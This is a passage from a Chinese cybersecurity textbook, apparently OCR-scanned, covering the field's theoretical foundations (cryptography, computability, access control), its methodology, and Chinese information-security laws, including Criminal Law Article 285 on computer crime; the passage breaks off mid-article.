随 着 计算 机 网 络 的 迅速 发 展 和 广泛 应 用 ,信息 领域 的 对 抗 已 经 从 电子 对 抗 发 展 到 信 
息 对 抗 。 

信息 对 抗 是 为 从 对 方 信 息 系 统 中 获取 有 用 信息 ,削弱 、 破 坏 对 方 信息 设备 和 信息 的 使 
用 效能 ,保障 已 方 信息 设备 和 信息 正常 发 挥 效 能 而 采取 的 综合 战术 、 技 术 措 施 , 其 实质 是 
斗争 双方 利用 电磁 波 和 信息 的 作用 来 争夺 电磁 频谱 和 信息 的 有 效 使 用 和 控制 权 。 

信息 对 抗 研究 信息 对 抗 的 理论 .信息 对 抗 技术 和 应 用 。 其 主要 研究 内 容 有 : 

QD 通信 对 抗 ; 

@ 雷达 对 抗 ; 

@ 光电 对 抗 ; 

@ 计算 机 网 络 对 抗 。 


1.2.4 ”网 络 空 间 安 全 学 科 的 理论 基础 


网 络 空间 安全 学 科 是 在 计算 机 、 通 信 、 电 子 、 数 学 、 物 理 、 生 物 、 法 律 , 管 理 和 教育 等 学 
科 的 基础 上 交叉 融合 发 展 而 来 的 ,其 理论 基础 与 这 些 学 科 相 关 , 但 在 学 科 的 形成 和 发 展 过 
程 中 又 丰富 和 发 展 了 这 些 理论 ,从 而 形成 了 自己 的 学 科 理 论 基础 。 


1. 数学 

数学 是 一 切 自 然 科学 的 理论 基础 ,当然 也 是 网 络 空间 安全 学 科 的 理论 基础 。 

现代 密码 可 以 分 为 两 类 : 一 类 是 基于 数学 的 密码 , 另 一 类 是 基于 非 数 学 的 密码 。 虽 
然 某 些 基于 非 数学 的 密码 技术 已 经 开始 走向 应 用 ,例如 基于 量子 物理 的 量子 密 钥 分 发 技 
术 , 但 基于 非 数学 的 密码 总 体 上 还 处 在 发 展 的 初期 阶段 。 目 前 广泛 实际 应 用 的 密码 仍然 
主要 是 基于 数学 的 密码 。 

对 于 基于 数学 的 密码 ,设计 一 个 密码 本 质 上 就 是 设计 一 个 数学 函数 ,破译 一 个 密码 本 
质 上 就 是 求解 一 个 数学 难题 ,这 就 清晰 地 阐明 了 数学 是 密码 学 的 理论 基础 。 作 为 密码 学 
理论 基础 之 一 的 数学 主要 有 代数 数论、 概率 统计 等 。 

协议 是 网 络 的 核心 ,因此 协议 安全 是 网 络 安全 的 核心 。 作 为 网 络 协 议 安全 理论 基础 
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之 一 的 数学 主要 有 逻辑 学 等 。 

因为 网 络 空间 安全 领域 的 斗争 本 质 上 是 对 抗 双 方 之 间 的 斗争 ,因此 数学 中 的 博弈 论 
便 成 为 网 络 空间 安全 的 基础 理论 之 一 。 

博弈 论 (Game Theory) 是 现代 数学 的 一 个 分 支 ,是 研究 具有 对 抗 或 竞争 性 质 的 行为 
的 理论 与 方法 。 一 般 称 具有 对 抗 或 竞争 性 质 的 行为 为 博弈 行为 。 在 博弈 行为 中 ,参加 对 
抗 或 竞争 的 各 方 具有 各 自 不 同 的 目标 或 利益 ,并 力图 选取 对 自己 最 有 利 或 最 合理 的 方案 。 
博弈 论 研 究 的 就 是 博弈 行为 中 对 抗 各 方 是 否 存在 最 合理 的 行为 方案 ,以 及 如 何 找到 这 个 
最 合理 的 方案 。 博 弈 论 考虑 对 抗 双方 的 预期 行为 和 实际 行为 ,并 研究 其 优化 策略 。 博 弈 
论 的 思想 古 已 有 之 ,我 国 古代 的 (孙子 兵法 ) 不 仅 是 一 部 军事 著作 ,而 且 是 最 早 的 一 部 博弈 
论 专 著 。 博 弈 论 已 经 在 经 济 、 军 事 、 体 育 和 商业 等 领域 得 到 广泛 应 用 。 网 络 空间 安全 领域 
的 斗争 无 一 不 具有 这 种 对 抗 性 或 竞争 性 ,如 网 络 的 攻 与 防 、 密 码 的 加 密 与 破译 、 病 毒 的 制 
毒 与 杀毒 ,信息 的 隐藏 与 提取 ,等 等 。 


2. 信息 论 、 控 制 论 和 系统 论 

信息 论 .控制 论 和 系统 论 是 现代 科学 的 理论 基础 ,也 是 网 络 空间 安全 学 科 的 理论 
基础 。 

信息 论 是 为 解决 现代 通信 问题 而 建立 的 ;控制 论 是 在 解决 自动 控制 问题 中 建立 的 ; 系 
统 论 是 为 解决 现代 化 大 科学 工程 项 目的 组 织 管理 问题 而 建立 的 。 在 开始 时 ,它们 都 是 独 
自 形成 的 独立 科学 理论 。 但 由 于 它们 之 间 具 有 紧密 的 联系 ,因此 在 后 来 的 应 用 和 发 展 中 
互相 渗透 ,互相 作用 ,出 现 了 趋向 综合 统一 、 形 成 统一 学 科 的 趋势 。 这 些 理论 构成 了 网 络 
空间 安全 学 科 的 理论 基础 。 

信息 论 对 信息 源 、 密 钥 、 加 密 和 密码 分 析 进 行 了 数学 分 析 , 用 不 确定 性 和 唯一 解 距离 
来 度量 密码 体制 的 安全 性 ,阐明 了 密码 体制 .完善 保密 、 纯 密码 ,理论 保密 和 实际 保密 等 重 
要 概念 ,把 密码 置 于 坚实 的 数学 基础 之 上 ,标志 着 密码 学 作为 一 门 独立 学 科 的 形成 。 因 
此 ,信息 论 成 为 密码 学 重要 的 理论 基础 之 一 。 

从 信息 论 角度 看 ,信息 隐藏 (嵌入 ) 可 以 理解 为 在 一 个 宽带 信道 (原始 宿主 信号 ) 上 用 
扩 频 通信 技术 传输 一 个 窄带 信号 (隐藏 信息 )。 尽 管 隐藏 信号 具有 一 定 的 能 量 ,但 分 布 到 
信道 中 任意 特征 上 的 能 量 是 难以 检测 的 。 隐 藏 信息 的 检测 是 一 个 有 品 信 道中 弱 信 号 的 检 
测 问题 。 因 此 ,信息 论 构成 了 信息 隐藏 的 理论 基础 之 一 。 

控制 论 是 研究 机 器 、 生 命 社会 中 控制 和 通信 的 一 般 规律 的 科学 。 它 研究 动态 系统 在 
变化 的 环境 条 件 下 如 何 保持 平衡 状态 或 稳定 状态 。 控 制 论 中 把 “控制 "定义 为 ; 为 了 改善 
受 控 对 象 的 功能 或 状态 ,获取 一 些 信 息 , 并 以 这 种 信息 为 基础 施加 作用 到 该 对 象 上 。 由 此 
可 见 , 控 制 的 基础 是 信息 ,信息 的 获取 是 为 了 控制 ,任何 控制 又 都 依赖 于 信息 反馈 。 

保护 ,检测 .反应 (PDR) 策 略 是 确保 信息 系统 安全 和 网 络 安 全 的 基本 策略 。 在 信息 
系统 和 网 络 系统 中 ,系统 的 安全 状态 是 系统 的 平衡 状态 或 稳定 状态 。 恶 意 软 件 的 入 侵 打 
破 了 这 种 平衡 和 稳定 。 检 测 到 这 种 入 侵 . 便 获得 了 控制 的 信息 ,进而 杀 灭 这 些 恶 意 软件 ， 
使 系统 恢复 安全 状态 。 

系统 论 是 研究 系统 的 一 般 模式 ,结构 和 规律 的 科学 。 系 统 论 的 核心 思想 是 整体 观念 。 
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任何 一 个 系统 都 是 一 个 有 机 的 整体 ,不 是 各 个 部 件 的 机 械 组 合 和 简单 相 加 。 系 统 的 功能 
是 各 部 件 在 孤立 状态 下 所 不 具有 的 。 系 统 论 的 能 动 性 不 仅 在 于 认识 系统 的 特点 和 规律 ， 
更 重要 的 是 在 于 利用 这 些 特 点 和 规律 去 控制 .管理 ,改造 或 创造 一 个 系统 ,使 它 的 存在 和 
发 展 符合 人 的 需求 。 

信息 安全 遵从 “ 木 桶 原理 ”“ 木 桶 原理 ” 正 是 系统 论 的 思想 在 信息 安全 领域 的 体现 。 

确保 信息 系统 安全 是 一 个 系统 工程 ,只 有 从 系统 的 软 硬 件 底层 做 起 ,从 整体 上 综合 采 
取 措 施 ,才能 比较 有 效 地 确保 信息 系统 的 安全 ,这 也 是 系统 论 的 思想 在 信息 安全 领域 的 具 
体 体 现 。 

以 上 策略 和 观点 已 经 经 过 信息 安全 的 实践 检验 ,证 明 是 正确 的 ,是 行 之 有 效 的 。 它 们 
符合 控制 论 和 系统 论 的 基本 原理 ,这 也 进一步 表明 ,控制 论 和 系统 论 是 信息 系统 安全 和 网 
络 安 全 的 理论 基础 之 一 。 


3. 计算 理论 

网 络 空间 安全 学 科 的 许多 问题 是 计算 安全 问题 ,因此 计算 理论 也 是 网 络 空间 安全 学 
科 的 理论 基础 之 一 。 这 里 主要 包括 可 计算 性 理论 和 计算 复杂 性 理论 等 。 

可 计算 性 理论 是 研究 计算 的 一 般 性 质 的 数学 理论 。 它 通过 建立 计算 的 数学 模型 , 精 
确 区 分 哪些 问题 是 可 计算 的 ,哪些 问题 是 不 可 计算 的 。 对 于 判定 问题 ,可 计算 性 理论 研究 
哪些 问题 是 可 判定 问题 ,哪些 问题 是 不 可 判定 问题 。 

计算 复杂 性 理论 使 用 数学 方法 对 计算 中 所 需 的 各 种 资源 的 耗费 作 定 量 的 分 析 , 并 研 
究 各 类 问题 之 间 在 计算 复杂 程度 上 的 相互 关系 和 基本 性 质 。 计 算 复 杂 性 理论 是 计算 理论 
在 可 计算 性 理论 之 后 的 又 一 个 重要 发 展 。 可 计算 性 理论 研究 区 分 哪些 问题 是 可 计算 的 ， 
哪些 问题 是 不 可 计算 的 ,但 是 这 里 的 可 计算 是 理论 上 的 可 计算 ,或 原则 上 的 可 计算 。 而 计 
算 复杂 性 理论 则 进一步 研究 现实 的 可 计算 性 ,如 研究 计算 一 个 问题 类 需要 多 少时 间 和 存 
储 空间 ,研究 哪些 问题 是 现实 可 计算 的 ,哪些 问题 虽然 是 理论 可 计算 的 ,但 因 计算 复杂 性 
太 大 而 实际 上 是 无 法 计算 的 。 

所 谓 判定 问题 ,是 这 样 一 类 问题 。 它 不 是 要 计算 出 一 个 数值 解 ,而 是 要 求 给 出 一 种 方 
法 ,用 这 种 方法 能 够 对 一 类 问题 做 出 确切 的 判定 。 如 果 这 种 方法 是 存在 的 、 确 定 的 , 则 这 
一 类 问题 就 是 可 判定 的 。 如 果 这 种 方法 不 存在 , 则 这 一 类 问题 就 是 不 可 判定 的 。 

判定 问题 是 广泛 存在 的 。 例 如 “程序 在 计算 机 上 运行 能 够 停机 吗 " 就 是 一 个 著名 的 
判定 问题 ,通常 称 之 为 “停机 问题 "。 要 解决 这 个 判定 问题 ,就 要 给 出 一 种 方法 ,用 这 种 方 
法 能 够 判定 所 有 的 具体 程序 在 计算 机 上 运行 是 否 能 够 停机 。 如 果 这 种 方法 是 存在 的 、 确 
定 的 , 则 这 个 问题 就 是 可 判定 的 。 如 果 这 种 方法 不 存在 , 则 这 个 问题 就 是 不 可 判定 的 。 初 
看 起 来 ,停机 问题 ”好像 很 简单 ,但 实际 上 这 个 问题 是 很 困难 的 。 已 经 证 明 * 停 机 问题 "是 
不 可 判定 的 。 即 ,不 存在 一 种 方法 能 够 判定 所 有 的 具体 程序 在 计算 机 上 运行 是 否 能 够 售 
机 。 这 个 问题 难 就 难 在 要 能 够 判定 所 有 的 程序 。 请 注意 ,“ 停 机 问题 "是 不 可 判定 问题 ,这 
只 说 明 没有 办 法 能 够 判定 所 有 程序 能 否 停机 ,并 不 是 说 某 一 个 具体 程序 能 否 停机 是 不 可 
判定 的 。 实 际 上 ,许多 具体 程序 的 停机 问题 是 可 以 判定 的 。 例 如 ,我 们 自己 写 一 个 简单 程 
序 , 判 定 能 否 停机 是 比较 容易 的 。 
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由 于 检测 判断 病毒 要 比 检测 判断 停机 困难 得 多 ,所 以 由 “停机 问题 ”不 可 判定 可 知 ,一 
般 计算 机 病毒 的 检测 是 不 可 判定 问题 。 这 就 告诉 我 们 ,没有 一 种 方法 ,能 够 检测 所 有 的 软 
件 是 否 有 病毒 。 但 是 ,许多 具体 软件 的 计算 机 病毒 检测 又 是 可 判定 的 。 据 此 得 知 : 一 种 
技术 方法 只 可 能 检测 发 现 一 部 分 病毒 ,不 可 能 检测 发 现 所 有 病毒 。 

众所周知 ,授权 是 计算 机 信息 系统 访问 控制 的 核心 。 计 算 机 信息 系统 是 安全 的 ,其 授 
权 系 统 必须 是 安全 的 。 已 经 证 明 : 一 般 意 义 上 ,对 于 给 定 的 授权 系统 是 否 安全 这 一 问题 
是 不 可 判定 问题 ,但 是 一 些 具体 * 受 限 ? 的 授权 系统 的 安全 问题 又 是 可 判定 问题 。 由 此 可 
知 , 一 般 信息 系统 是 否 安全 这 一 问题 是 不 可 判定 的 ,但 是 一 些 具体 “ 受 限 ”的 信息 系统 的 安 
全 问题 又 是 可 判定 的 。 同 样 ,一 般 软件 系统 的 安全 问题 是 不 可 判定 的 ,而 一 些 具体 “ 受 限 ” 
的 软件 系统 的 安全 问题 却 又 是 可 判定 的 。 

十 分 遗憾 ,网 络 空间 安全 领域 的 许多 问题 都 是 不 可 判定 的 。 这 就 告诉 我 们 ,解决 信息 
安全 问题 是 具有 挑战 性 的 ,也 是 十 分 有 趣 的 。 

与 计算 复杂 性 类 似 , 可 判定 问题 也 存在 判定 复杂 性 问题 。 有 些 问 题 虽 然 是 理论 可 判 
定 的 ,但 因 判 定 复杂 性 太 大 而 实际 上 是 无 法 判定 的 。 这 就 说 明了 可 计算 性 理论 是 信息 系 
统 安全 的 理论 基础 之 一 。 

本 质 上 ,密码 破译 就 是 求解 一 个 数学 难题 ,如 果 这 个 难题 是 理论 不 可 计算 的 , 则 这 个 
密码 就 是 理论 上 安全 的 。 如 果 这 个 难题 虽然 是 理论 可 计算 的 ,但 是 由 于 计算 复杂 性 太 大 
而 实际 上 不 可 计算 , 则 这 个 密码 就 是 实际 安全 的 ,或 计算 上 安全 的 。 至 今 ,只 有 "一 次 一 
密 ” 密 码 是 理论 上 安全 的 密码 ,其 余 的 密码 都 只 能 是 计算 上 安全 的 密码 。 因 此 ,对 于 设计 
密码 来 说 ,要 力争 设计 出 正常 应 用 高 效 方便 而 对 手 破译 足够 复杂 的 密码 。 这 也 说 明 计算 
复杂 性 理论 是 密码 学 的 理论 基础 之 一 。 


4. 密码 学 理论 

虽然 信息 论 葛 定 了 密码 学 的 基础 。 但 是 ,密码 学 在 其 发 展 过 程 中 已 经 超越 了 传统 信 
Bit ,形成 了 自己 的 一 些 新 理论 ,例如 单 向 陷 门 函数 理论 . 公 钥 密码 理论 . 零 知 识 证 明理 
ie .安全 多 方 计算 理论 ,以 及 部 分 密码 设计 与 分 析 理论 。 

从 应 用 角度 看 ,密码 技术 是 网 络 空间 安全 的 一 种 共性 技术 ,许多 网 络 空间 安全 领域 都 
要 应 用 密码 技术 。 因 此 ,密码 学 理论 是 网 络 空间 安全 学 科 的 理论 基础 之 一 ,而 且 是 网 络 空 
间 安 全 学 科 特 有 的 理论 基础 。 


5. 访问 控制 理论 

访问 控制 是 信息 系统 安全 的 核心 问题 。 访 问 控制 的 本 质 是 : 允许 授权 者 执行 某 种 操 
作 、 获 得 某 种 资源 ;不 允许 非 授 权 者 执行 某 种 操作 、 获 得 某 种 资源 。 信 息 系统 中 的 身份 认 
证 便 是 一 种 最 基本 的 访问 控制 。 本 质 上 ,许多 网 络 空间 安全 技术 都 可 看 作 访 问 控制 , 例 
如 ,密码 技术 也 可 以 看 作 一 种 访问 控制 ,这 是 因为 ,在 密码 技术 中 密 钥 就 是 权限 ,拥有 密 钥 
就 可 以 正确 执行 相应 密码 操作 、 并 获得 需要 的 信息 。 没 有 密 钥 , 就 不 能 正确 执行 相应 密码 
操作 ,不 能 获得 需要 的 信息 。 只 给 合法 用 户 分 配 密 钥 , 不 给 非法 用 户 分 配 密 钥 ,就 实现 了 
访问 控制 。 

访问 控制 理论 包括 访问 控制 模型 及 其 安全 理论 。 现 在 已 有 许多 访问 控制 模型 ,例如 
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和 矩阵 模型 `.BLP 模型 .BIBA 模型 .中 国 墙 模型 .基于 角色 的 模型 (RBAC) 和 基于 属性 的 访 
问 控 制 模型 等 。 

从 应 用 角度 看 ,访问 控制 技术 也 是 网 络 空间 安全 的 一 种 共性 技术 ,许多 网 络 空间 安全 
领域 都 要 应 用 访问 控制 技术 。 因 此 ,访问 控制 理论 是 网 络 空间 安全 学 科 的 理论 基础 之 一 ， 
而 且 是 网 络 空间 安全 学 科 所 特有 的 理论 基础 。 

综 上 所 述 ,数学 .信息论 ,控制 论 . 系 统 论 .可 计算 性 理论 .计算 复杂 性 理论 、 密 码 学 理 
论 和 访问 控制 理论 等 是 网 络 空间 安全 学 科 的 理论 基础 。 


1.2.5 网 络 空间 安全 学 科 的 方法 论 基 础 


第 卡 儿 在 1637 年 出 版 了 著作 《方法 论 》, 研 究 论述 了 解决 问题 的 方法 ,对 西方 人 的 思 
维 方式 和 科学 研究 方法 产生 了 极 大 的 影响 。 笛 卡 儿 在 书 中 把 研究 的 方法 划分 为 4 步 : 

。 永 不 接受 任何 我 自己 不 清楚 的 真理 。 对 自己 不 清楚 的 东西 ,不管 是 什么 权威 的 结 

论 ,都 可 以 怀疑 。 

* 将 要 研究 的 复杂 问题 ,尽量 分 解 为 多 个 比较 简单 的 小 问题 ,一 个 一 个 地 解决 。 

* 将 这 些小 问题 从 简单 到 复杂 排序 , 先 从 容易 解决 的 问题 和 人手。 

*。 将 所 有 问题 解决 后 ,再 综合 起 来 检验 ,看 是 否 完全 ,是 否 将 问题 彻底 解决 了 。 

笛 卡 儿 的 方法 论 强调 了 把 复杂 问题 分 解 成 一 些 细小 的 问题 分 别 解决 ,是 一 种 分 而 治 
之 的 思想 ,但 是 它 忽视 了 各 个 部 分 的 关联 和 彼此 影响 。 近 代 科学 的 发 展 使 科学 家 发 现 , 许 
多 复杂 问题 无 法 分 解 ,或 分 解 后 的 细小 问题 的 性 质 之 和 并 不 能 反映 原 问题 的 性 质 , 因 此 必 
须 用 整体 的 思想 和 方法 来 处 理 , 由 此 导致 系统 工程 的 出 现 , 方 法 论 由 传统 的 方法 论 发 展 到 
系统 性 的 方法 论 。 系 统 工程 的 出 现 推动 了 环境 科学 .气象 学 ,生物 学 .人 工 智 能 和 软件 工 
程 的 快速 发 展 。 

网 络 空间 安全 保障 体系 由 信息 基础 设施 、 安 全 防御 体系 .技术 规范 与 标准 ` 法 律 法 规 
和 组 织 管理 等 组 成 。 而 网 络 空间 安全 保障 体系 的 实施 ,必须 以 人 为 核心 ,这 就 成 为 一 个 复 
杂 的 巨 系 统 。 因 此 ,解决 网 络 空间 安全 领域 的 问题 必须 遵循 一 套 科 学 的 方法 论 , 人 们 在 网 
络 空间 安全 保障 的 长 期 实践 中 逐渐 形成 了 自己 的 方法 论 。 

网 络 空间 安全 学 科 的 方法 论 是 以 解决 网 络 空间 安全 问题 为 目标 、 以 适应 网 络 空间 安 
全 需求 为 特征 的 具体 科学 方法 论 , 它 既 包 含 分 而 治之 的 传统 方法 论 ,又 包含 综合 治理 的 系 
统 工程 方法 论 ,并 将 这 两 者 有 机 地 融合 为 一 体 。 网 络 空间 安全 学 科 的 方法 论 与 数学 或 计 
算 机 科学 与 技术 等 学 科 的 方法 论 既 有 联系 又 有 区 别 。 具 体 概括 为 以 下 4 个 步 又 : 

QD 理论 分 析 ; 

Q) 逆向 分 析 ; 

@@ 实验 验证 ; 

@ 技术 实现 。 
其 中 的 逆向 分 析 是 网 络 空 间 安全 学 科 所 特有 的 方法 论 。 这 是 因为 网 络 空间 安全 领域 的 斗 
争 本 质 上 都 是 攻防 双方 的 斗争 ,网 络 空间 安全 学 科 的 每 一 分 支 都 具有 攻 和 防 两 个 方面 , 因 
此 必须 从 攻 和 防 两 个 方面 进行 分 析 研 究 。 例 如 ,密码 设计 必须 遵循 公开 设计 原则 , 即 假设 
对 手 知道 密码 算法 .掌握 足够 的 明 密 文 数据 ,拥有 足够 的 计算 资源 ,在 这 样 的 条 件 下 仍 要 
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确保 密码 是 安全 的 。 这 就 要 求 我 们 在 进行 密码 设计 时 ,必须 了 解密 码 破译 的 理论 和 技术 ， 
否则 就 无 法 设计 出 安全 的 密码 。 反 过 来 ,在 进行 密码 破译 时 ,必须 了 解密 码 设计 的 理论 和 
技术 ,否则 就 无 法 有 效 破译 密码 。 在 进行 信息 系统 安全 和 网 络 安全 设计 时 ,首先 要 进行 安 
全 威胁 分 析 和 风险 评估 ,必须 了 解 系统 攻击 和 网 络 攻 击 的 技术 和 方法 ,否则 就 无 法 设计 出 
安全 的 信息 系统 和 安全 的 网 络 系统 。 这 些 做 法 就 是 逆向 分 析 方 法 论 的 具体 应 用 ,并 且 已 
被 实践 证 明 是 正确 的 和 有 效 的 。 

在 运用 网 络 空间 安全 学 科 的 方法 论 分 析 和 解决 网 络 空间 安全 问题 时 ,这 4 个 步骤 既 
可 以 独立 运用 ,也 可 以 结合 运用 。 通 常 需要 循环 往复 多 次 ,才能 较 好 地 解决 网 络 空间 安全 
问题 。 

在 运用 网 络 空间 安全 学 科 的 方法 论 分 析 和 解决 网 络 空间 安全 问题 时 ,还 应 当 注 意 以 
下 几 点 : 

CD 坚持 “以 人 为 核心 ”。 这 是 因为 ,网 络 空间 安全 领域 的 对 抗 , 本 质 上 是 人 与 人 之 间 
的 对 抗 。 不 考虑 人 的 因素 ,是 不 可 能 有 效 解决 网 络 空间 安全 问题 的 。 例 如 , 当 人 们 用 杀 病 
毒 软件 去 查 杀 病毒 时 ,表面 上 是 杀 病 毒 软件 与 病毒 软件 之 间 的 斗争 ,但 实际 上 是 编写 杀 病 
毒 软件 的 人 与 编写 病毒 软件 的 人 之 间 的 斗争 。 

众所周知 ,在 确保 网 络 空间 安全 的 工作 中 ,人 是 最 积极 的 因素 。 但 同时 必须 指出 ,人 
也 是 一 个 薄弱 因素 。 这 是 因为 人 是 有 思想 和 情感 的 ,人 是 会 疲劳 的 。 许 多 网 络 空间 安全 
事件 都 是 由 于 人 的 思想 出 了 问题 所 造成 的 。 因 此 ,对 人 进行 有 效 的 政治 思想 教育 和 管理 ， 
是 十 分 必要 的 。 

@ 强调 底层 性 和 系统 性 。 即 ,从 系统 的 软 硬 件 底 层 和 系统 整体 上 分 析 信息 安全 问 
题 ,从 系统 的 软 硬 件 底层 和 系统 整体 上 综合 采取 措施 解决 信息 安全 问题 。 

@ 实行 综合 治理 。 这 是 因为 ,网 络 空间 安全 学 科 是 多 学 科 交叉 融合 形成 的 交叉 学 
科 , 网 络 空间 安全 问题 大 都 涉及 多 方面 的 问题 ,而 且 信息 系统 具有 设备 安全 ,数据 安全 、 行 
为 安全 和 内 容 安全 等 多 层次 的 安全 问题 。 因 此 ,必须 综合 采取 法 律 管理, 教育、 技术 多 方 
面 的 措施 综合 治理 ,才能 较 好 地 解决 网 络 空间 安全 问题 。 千 万 不 能 忽视 法 律 .管理 .教育 
的 作用 ,许多 时 候 它们 的 作用 大 于 技术 。* 七 分 管理 ,三 分 技术 ”是 信息 安全 领域 的 一 句 行 
话 , 是 人 们 在 长 期 的 信息 安全 工作 中 总 结 出 来 的 经 验 。 就 技术 措施 而 言 ,每 一 种 信息 安全 
技术 都 有 自己 的 优势 ,同时 也 有 自己 的 弱势 ,没有 一 种 信息 安全 技术 能 够 解决 所 有 信息 安 
全 问题 。 而 且 , 任 何 一 种 信息 安全 技术 ,只 有 融和 信息 系统 才能 发 挥 实际 作用 。 因 此 , 综 
合 采用 多 种 信息 安全 技术 ,将 其 融入 信息 系统 ,共同 发 挥 最 大 实际 效能 ,是 解决 信息 安全 
问题 的 有 效 方法 。 

综 上 所 述 ,我 们 应 当 遵循 网 络 空间 安全 学 科 的 方法 论 ,坚持 “以 人 为 核心 ,强调 底层 
性 和 系统 性 ,实行 综合 治理 。 在 解决 具体 网 络 空间 安全 问题 时 ,坚持 理论 联系 实际 ,运用 
定性 分 析 与 定量 分 析 相 结合 ,注意 量变 会 引发 质变 ,局 部 治理 与 综合 治理 相 结 合 ,追求 整 
体 效 能 。 只 有 这 样 ,才能 较 好 地 解决 网 络 空间 安全 中 的 理论 .技术 和 应 用 问题 。 


18 


13 。 网 络 空间 安全 法 律 法 规 | 


法 律 法 规 是 指 国 家 按照 统治 阶级 的 利益 和 意志 制定 或 者 认可 ,并 由 国家 强制 力 保证 
其 实施 的 行为 规范 的 总 和 ,是 人 们 在 社会 活动 中 必须 遵守 的 纪律 ,是 人 们 从 事 社会 活动 所 
不 能 逾越 的 行为 底线 ,违反 了 就 要 受到 惩罚 。 

信息 安全 法 律 法 规 是 信息 安全 保障 体系 建设 中 的 必要 环节 , 它 明确 了 信息 安全 的 基 
本 原则 和 基本 制度 .信息 安全 相关 行为 规范 .信息 安全 中 各 方 权 利和 义务 以 及 违反 信息 安 
全 的 行为 ,并 明确 对 这 些 行为 进行 相应 的 处 罚 。 

1.3.1 我 国信 息 安全 立法 现状 

本 小 节 主 要 讨论 我 国有 关 信 息 安全 的 主要 法 律 和 行政 法 规 。 我国 有关 信息 安全 管理 
的 法 律 ,从 1994 4E 2 H 18 日 国务 院 第 147 号 令 发 布 的 (中 华人 民 共 和 国 计 算 机 信息 系统 
安全 保护 条 例 》, 到 近年 来 4 中华 人民 共和 国 网 络 安 全 法 》( 以 下 简称 4 网络 安全 法 》, 见 
图 1-9) 和 《中 华人 民 共 和 国 密码 法 》( 以 下 简称 (密码 法 》 见 图 1-10) 的 正式 实施 ,已 经 初 
步 形 成 了 从 法 律 , 行 政法 规 到 部 门 规范 的 网 络 安全 法 律 体系 。 我 国有 关 信 息 安全 的 主要 
法 律 法 规 见 表 1-1。 
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中 华人 民 共 和 国 中 华人 民 共 和 国 
网 络 安全 法 | 密码 法 
LIII , | xr*"umu 
图 1-9 《中 华人 民 共 和 国 网 络 安全 法 》 图 1-10 《中 华人 民 共和 国 密码 法 》 


1.3.2 ”计算 机 犯罪 有 关 《 刑 法 》 的 法 律 条 款 


中 国 社 会 信息 化 已 从 以 计算 机 单机 、 互 联网 为 中 心 的 阶段 ,进入 以 网 络 服务 平台 为 中 
心 的 时 期 ,计算 机 、 互 联网 相关 犯罪 随 之 完成 了 三 次 改变 : 从 20 世纪 90 年 代 计 算 机 犯罪 
Ccomputer crime) 到 21 世纪 初 的 网 络 犯罪 (cyber crime) ,再 转变 为 当前 的 网 络 空间 犯罪 
(crimes in cyberspace) 。 中 国 刑法 及 时 回应 了 每 次 改变 。1997 年 修订 的 (4 中华 人民 共和 
国 刑法 兴 以 下 简称 (刑法 妨 设 立 了 ”两 点 一 面 ?的 计算 机 犯罪 立法 ,增设 了 非法 侵入 计算 机 
信息 系统 罪 和 破坏 计算 机 信息 系统 罪 ,对 于 利用 计算 机 实施 金融 诈骗 .盗窃 .贪污 等 传统 
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表 1-1 我 国有 关 信息 安全 的 主要 法 律 和 行政 法 规 


类 x 发 布 部 门 名 称 
中 华人 民 共 和 国 宪法 
全 国人 大 
中 华人 民 共 和 国 刑法 
中 华人 民 共 和 国 国 家 安全 法 
中 华人 民 共 和 国 预 防 未 成 年 人 犯罪 法 
全 国人 大 常委 会 关于 维护 互联 网 安全 的 决定 
中 华人 民 共 和 国电 子 签名 法 
国家 法 律 法 规 
中 华人 民 共 和 国治 安 管理 处 罚 法 
全 国人 大 常务 委员 会 
中 华人 民 共 和 国 侵权 责任 法 
中 华人 民 共 和 国保 守 国家 秘密 法 
全 国人 大 常委 会 关于 加 强 网 络 信息 保护 的 决定 
中 华人 民 共 和 国 网 络 安全 法 
中 华人 民 共 和 国 密码 法 


中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 


中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 管理 暂行 规定 


商用 密码 管理 条 例 


中 华人 民 共 和 国电 信条 例 
行政 法 规 国务 院 


互联 网 信息 服务 管理 办 法 


计算 机 软件 保护 条 例 


互联 网 上 网 服务 营业 场所 管理 条 例 


信息 网 络 传播 保护 条 例 


计算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 


计算 机 信息 系统 保密 管理 暂行 规定 


信息 安全 产品 测评 认证 管理 办 法 


计算 机 病毒 防治 管理 办 法 


公用 电信 网 间 互 联 管理 规定 


部 门 规范 国务 院 有 关 部 门 电子 认证 服务 管理 办 法 


商用 密码 产品 生产 管理 规定 


互联 网 电子 邮件 服务 管理 办 法 


互联 网 安全 保护 技术 措施 规定 


信息 安全 等 级 保护 管理 办 法 


通信 网 络 安全 防护 管理 办 法 
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犯罪 的 ,依照 刑法 有 关 规 定 定 罪 处 罚 。 之 后 ,为 应 对 犯罪 网 络 化 发 展 ,中 国 先后 通过 了 《 关 
于 维护 互联 网 安全 的 决定 》(2000 年 多 中 华人 民 共 和 国 刑法 修正 案 ( 三 )》(2001 年 多 中 华 
人 民 共 和 国 刑法 修正 案 ( 五 )》(2005 年 ) 中 华人 民 共 和 国 刑法 修正 案 ( 七 )》(2009 年 多 中 
华人 民 共 和 国 刑法 修正 案 ( 九 )》(2015 年 ) 《中 华人 民 共 和 国 刑法 修正 案 ( 十 )》(2017 年 ) 
增设 了 十 多 种 涉及 网 络 与 数据 的 犯罪 ,建立 了 侵犯 计算 机 数据 及 信息 系统 安全 犯罪 ,传统 
犯罪 网 络 化 的 刑事 责任 确认 、 妨 害 信 息 网 络 管理 秩序 犯罪 ,侵犯 个 人 信息 犯罪 组 成 的 “四 
位 一 体 ” 的 网 络 空间 犯罪 立法 体系 。《 中 华人 民 共 和 国 刑法 修正 案 ( 十 )) 关 于 计算 机 犯罪 
的 主要 条 款 如 下 : 
。 第 二 百 八 十 五 条 ”违反 国家 规定 ,侵入 国家 事务 、 国 防 建设 .尖端 科学 技术 领域 的 
计算 机 信息 系统 的 ,处 三 年 以 下 有 期 徒刑 或 者 拘役 。 
违反 国家 规定 ,侵入 前 款 规 定 以 外 的 计算 机 信息 系统 或 者 采用 其 他 技术 手段 ,获取 该 
计算 机 信息 系统 中 存储 、 处 理 或 者 传输 的 数据 ,或 者 对 该 计算 机 信息 系统 实施 非法 控制 ， 
情节 严重 的 ,处 三 年 以 下 有 期 徒刑 或 者 拘役 ,并 处 或 者 单 处 罚金 ;情节 特别 严重 的 ,处 三 年 
以 上 七 年 以 下 有 期 徒刑 ,并 处 罚金 。 

提供 专门 用 于 侵入 、 非 法 控制 计算 机 信息 系统 的 程序 工具 ,或 者 明知 他 人 实施 侵入 、 
